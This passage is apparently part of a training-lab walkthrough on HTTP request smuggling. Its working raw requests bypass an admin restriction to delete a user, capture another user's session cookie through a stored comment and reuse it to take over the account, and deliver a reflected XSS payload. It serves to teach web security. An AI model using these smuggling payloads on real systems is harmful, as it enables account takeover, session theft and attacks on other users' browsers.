HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=ycEzvjDQ6ErWl6ZIefqKXcV52WMJiBBj; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 2881
<!DOCTYPE html>
<html>
…
<section class="top-links">
<a href="/login">Account login</a><p>|</p>
<a href="/admin">Admin panel</a><p>|</p>
</section>
</header>
<section>
<h1>Users</h1>
<div>
<span>administrator - </span>
<a href="/admin/delete?username=administrator">Delete</a>
</div>
<div>
<span>carlos - </span>
<a href="/admin/delete?username=carlos">Delete</a>
</div>
<div>
<span>wiener - </span>
<a href="/admin/delete?username=wiener">Delete</a>
</div>
</section>
…
</html>
Now that we have access to the admin panel, we can delete the user carlos. We edit the smuggled request again for this step.
POST / HTTP/1.1
Host: acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Origin: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
Connection: close
Referer: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net/
Cookie: session=B6FJ4MUlNcOi2sqBm2MGDmewPk8sWkFp
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
X-yOldbL-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close
x=1
We send the edited request twice and examine the second response.
HTTP/1.1 302 Found
Location: /admin
Set-Cookie: session=GG99CB8ubsDVVaEpExzeHDC0qqSv59dj; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 0
As in the previous labs, the server redirected us to the admin panel. To confirm that the deletion was processed, we load the home page of the application and see the lab marked as solved.
…
<span>LAB</span>
<p>Solved</p>
<span class="lab-status-icon"></span>
</div>
</div>
</section>
<section id="notification-labsolved" class="notification-labsolved-hidden">
<div class="container">
<h4>Congratulations, you solved the lab!</h4>
<div>
…
9. Exploiting HTTP request smuggling to capture other users’ requests
In this lab we must capture another user's session cookie and use it to access their account. For that, the victim's request has to be stored somewhere we can read it back, and the blog's comment function is ideal. We smuggle a POST /post/comment that carries our own session cookie and a valid CSRF token, places the comment parameter last in the body, and declares a Content-Length (670) far larger than the body actually sent. The back-end waits for the missing bytes and takes them from the next request on the connection, so the victim's request line, headers and cookies become the tail of our comment. As in the previous labs, we capture a request and edit it.
POST / HTTP/1.1
Host: acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 670
Cookie: session=Zp4vHahBtBjcmVrWsHcEnW4VqHHlfST4
csrf=k3VpZNW1DpTwO3Xa7wLSB7narTBqXpUp&postId=5&name=test&email=deneme%40deneme.com&website=&comment=test
We send the prepared request, then reload the comments of the post in the browser. This has to be repeated until a comment appears containing a request that is not our own (recognisable by a different session cookie). If the back-end times out waiting for the body, the smuggled Content-Length is too large; if the capture is cut off before the Cookie header, it is too small, so adjust it in steps.
…
<section class="comment">
<p>
<img src="/resources/images/avatarDefault.svg" class="avatar">test | 23 March 2020
</p>
<p>test
GET / HTTP/1.1
Host: acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Cookie: victim-fingerprint=ZUB3keIiSE4cr1nwniqepKTEAWSDNYFy; secret=1Uo5bUqU7PwWSdBQlCjHwL67kedsSJtb; session=LbbOKtuQQHXpdvKINvUnv7MYu4vSJ78l
</p>
<p></p>
</section>
…
The target user's request has been stored as a comment, including their Cookie header with the session value. Replacing our own session cookie with the captured one is all that is needed: the application treats any request carrying that cookie as the victim's, so it is the Cookie header in the request below, not the form fields, that gives us the account.
POST /login HTTP/1.1
Host: acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net
Connection: close
Cookie: session=LbbOKtuQQHXpdvKINvUnv7MYu4vSJ78l
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
csrf=k3VpZNW1DpTwO3Xa7wLSB7narTBqXpUp&username=carlos&password=123456
After sending this request, the lab is marked as solved.
…
<span>LAB</span>
<p>Solved</p>
<span class="lab-status-icon"></span>
</div>
</div>
</section>
<section id="notification-labsolved" class="notification-labsolved-hidden">
<div class="container">
<h4>Congratulations, you solved the lab!</h4>
<div>
…
10. Exploiting HTTP request smuggling to deliver reflected XSS
In this lab the comment form of a blog post reflects the User-Agent header into a hidden input field, and we must use the smuggling vulnerability to deliver a reflected XSS through it. The smuggled request is GET /post?postId=1 with a User-Agent value that closes the attribute and the tag and injects a script. Whoever sends the next request on the connection receives that page, so the payload runs in their browser without them clicking a link or doing anything at all, which is what distinguishes this from ordinary reflected XSS. As before, we take our captured request and edit it.
POST / HTTP/1.1
Host: acac1fde1f99942080380adb00430028.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Transfer-Encoding: chunked
0
GET /post?postId=1 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1
We send the edited request to the target server and then load any page of the site in the browser, standing in for the victim. The browser receives the response to the smuggled request and shows the alert box: the XSS has been delivered through the request smuggling vulnerability, and the lab is marked as solved.
…
<span>LAB</span>
<p>Solved</p>
<span class="lab-status-icon"></span>
</div>
</div>
</section>
<section id="notification-labsolved" class="notification-labsolved-hidden">
<div class="container">
<h4>Congratulations, you solved the lab!</h4>
<div>
…